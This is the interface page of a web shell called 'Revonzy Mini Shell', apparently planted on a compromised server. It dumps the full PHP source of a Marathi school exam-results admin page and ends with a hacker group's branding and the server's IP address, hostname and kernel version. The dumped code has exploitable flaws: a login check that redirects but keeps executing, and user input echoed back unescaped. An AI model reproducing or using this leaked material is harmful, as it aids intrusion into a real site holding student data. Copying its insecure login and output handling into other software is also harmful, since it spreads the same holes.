Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/www/panel.atsevairag.com/atse/atse_admin_panel007/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/www/panel.atsevairag.com/atse/atse_admin_panel007/shera-setting.php

<?php
	require_once("../lib/class/functions.php");
	$db = new functions();
	
	$current_page = "";
	
	$delete_success_msg	=	0;
	
	if(!isset($_SESSION['current_admn_email']))
	{	
		header("Location:/atse_admin_panel007/index.php");
	}
?>
<html>
<head>
	<meta charset="UTF-8">
	<title>ATSE Vairag</title>
	
	<link rel="stylesheet" type="text/css" href="/css/stylesheet.css" />
	<link rel="stylesheet" type="text/css" href="/css/jquery-ui.css" />
	<script type="text/javascript" src="/js/jquery-1.10.2.js"></script>
	<script type="text/javascript" src="/js/jquery-ui.js"></script>
	<script type="text/javascript" src="/js/site.js"></script>
</head>
<body>

<?php
	require_once('header.php');
?>
	<div style="min-height:570px;">
		<div class="admin-mid-section" style="width:100%;">
		
			<div class="search_container" style="text-align:center;">
			<br />
			<center><strong>निकाल शेरा</strong></center>
			<hr />
			    <br />
			    <br />
<?php
					$post_madhyam   =   "";
					$post_standard  =   "";
					$post_center_name=   "";
					
					$standard_error 	=	"";
					$center_name_error 	=	"";
					$madhyam_fees_error =	"";
			            
			        if(isset($_POST['submit_d']))
			        {
			            $post_madhyam   =   $_POST['madhyam_and_fees'];
			            $post_standard  =   $_POST['standard'];
			            $post_center_name=   $_POST['center_name'];
						
						if($post_center_name=="केंद्र निवडा")
						{
							$center_name_error = "कृपया केंद्र निवडा";
							$error_flag		=	1;
						}
						else if($post_standard=="इयत्ता निवडा")
						{
							$standard_error	=	"कृपया इयत्ता निवडा";
							$error_flag		=	1;
						}
						else if($post_madhyam=="माध्यम आणि फी निवडा")
						{
							$madhyam_fees_error	=	"कृपया माध्यम आणि फी निवडा";
							$error_flag		=	1;
						}
			        }
?>
			    <div class="search_container" style="text-align:center;">
				<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
				
				<label style="color:red;"><?php echo $center_name_error.$standard_error.$madhyam_fees_error; ?></label>
				<br />

				<select name="center_name" id="" class="registered_order_txt" >
					<?php
						
						if($post_center_name!="" AND $post_center_name!="केंद्र निवडा")
						{
							$r_center_name	=	$db->get_result_center_name_center_id($post_center_name);
					?>
						<option value="<?php echo $post_center_name; ?>"><?php echo $r_center_name; ?></option>
					<?php
						}
					?>
					<option value="केंद्र निवडा">केंद्र निवडा</option>
					<?php
						$centres_list = array();
						$centres_list = $db->get_all_added_centres();
						
						if(!empty($centres_list))
						{
							$count = 0;
							foreach($centres_list as $centre)
							{
								$id			=	$centres_list[$count][0];
								$center_name=	$centres_list[$count][1];
								$address	=	$centres_list[$count][2];
								$contact_no	=	$centres_list[$count][3];
								$fax_number	=	$centres_list[$count][4];
								$email_id	=	$centres_list[$count][5];
								$search_jilha		=	$centres_list[$count][6];
								$date		=	$centres_list[$count][7];
								$time		=	$centres_list[$count][8];
								
					?>
						<option value="<?php echo $id; ?>"><?php echo $center_name.", जिल्हा  - ".$search_jilha." (केंद्र क्रमांक - ".$id.")"; ?></option>
					<?php
								$count++;
							}
						}	
					?>
				</select>
				
				<select name="standard" id="standard_val" class="registered_order_txt">
					<?php
						if($post_standard!="" AND $post_standard!="इयत्ता निवडा")
						{
					?>
					<option value="<?php echo $post_standard; ?>"><?php echo $post_standard; ?></option>
					<?php
						}
					?>
					<option value="इयत्ता निवडा">इयत्ता निवडा</option>
					<option value="पहिली">पहिली</option>
					<option value="दुसरी">दुसरी </option>
					<option value="तिसरी">तिसरी </option>
					<option value="चौथी">चौथी</option>
					<option value="पाचवी">पाचवी</option>
					<option value="सहावी">सहावी</option>
					<option value="सातवी">सातवी</option>
				</select>
				
				<select name="madhyam_and_fees" id="level_and_fees" class="registered_order_txt" >
				
					<?php
						if($post_madhyam!="")
						{
					?>
					<option value="<?php echo $post_madhyam; ?>"><?php echo $post_madhyam; ?></option>
					<?php
						}
					?>
					<option value="माध्यम आणि फी निवडा">माध्यम आणि फी निवडा</option>
					<option value="मराठी">मराठी</option>
					<option value="सेमी इंग्लिश">सेमी इंग्लिश</option>
				</select>
			    
			    <input type="submit" name="submit_d" value="सीट नंबर तयार करा" id="" class="reg_btn_form" style="width:180px;" />
				
			    <br />
			    <br />
			    <!--<a href="seat-number-setting.php?marathi_medium" class="reg_btn_form" style="width:140px;">मराठी माध्यम - सीट नंबर तयार करा</a>
			    <a href="seat-number-setting.php?english_medium" class="reg_btn_form" style="width:140px;">सेमी इंग्लिश माध्यम - सीट नंबर तयार करा</a>-->
			    
			    <br />
			    <br />
			    <a href="/atse_admin_panel007/marks-report.php">विद्यार्थ्यांची निकाल यादी पहा</a>
			    <br />
			    <br />
			    
                <table border="1" class="centre_tab" style="font-size:14px; margin:auto;">
			        <tr style="background-color:#EFEFEF;">
			            <td width="100">अ. क्र.</td>
			            <td width="200">इयत्ता</td>
			            <td width="200">माध्यम</td>
			            <td width="200">विद्यार्थ्याचे नाव</td>
			            <td width="200">एकूण गुण</td>
			            <td width="300">शेरा</td>
				    </tr>
			    <?php					
					$res_rajyastariy_limit			=	"";
					$res_jilhastariy_limit			=	"";
					$res_kendrastariy_limit			=	"";
						
					$levels_of_result	=	$db->get_value_of_result_setting();
					
					if(!empty($levels_of_result))
					{
						$res_rajyastariy_limit			=	$levels_of_result['rajya'];
						$res_jilhastariy_limit			=	$levels_of_result['jilha'];
						$res_kendrastariy_limit			=	$levels_of_result['kendra'];
					}
				
					$students_data = $db->get_students_data_for_shera($post_center_name,$post_madhyam,$post_standard);
					
					if(!empty($students_data))
					{
						$cntr = 0;
						
						foreach($students_data as $stud_record)
						{
							$res_id				=	$stud_record[0];
							$exam_seat_number	=	$stud_record[1];
							$standard			=	$stud_record[2];
							$madhyam_and_fees	=	$stud_record[3];
							$full_name			=	$stud_record[4];
							$eng_buddhimatta	=	$stud_record[5];
							$total_marks		=	$stud_record[6];
							$shera				=	$stud_record[7];
				?>
					<tr style="background-color:#FCFCFC;">
						<td><?php echo $cntr + 1; ?></td>
						<td><?php echo $standard; ?></td>
						<td><?php echo $madhyam_and_fees; ?></td>
						<td><?php echo $full_name; ?></td>
						<td><?php echo $total_marks; ?></td>
						<td><?php echo $shera; ?></td>
					</tr>
					 <?php
							$cntr++;
						 }
					}
				else{
	?>
				<tr style="background-color:#FCFCFC;">
					<td colspan="6">कोणतीही बातमी जतन केलेली नाही </td>
				</tr>
	<?php
}	
                     
                	
			    ?>
			    </table>
			</div>
		</div>
	</div>
<?php
	require_once('footer.php');
?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4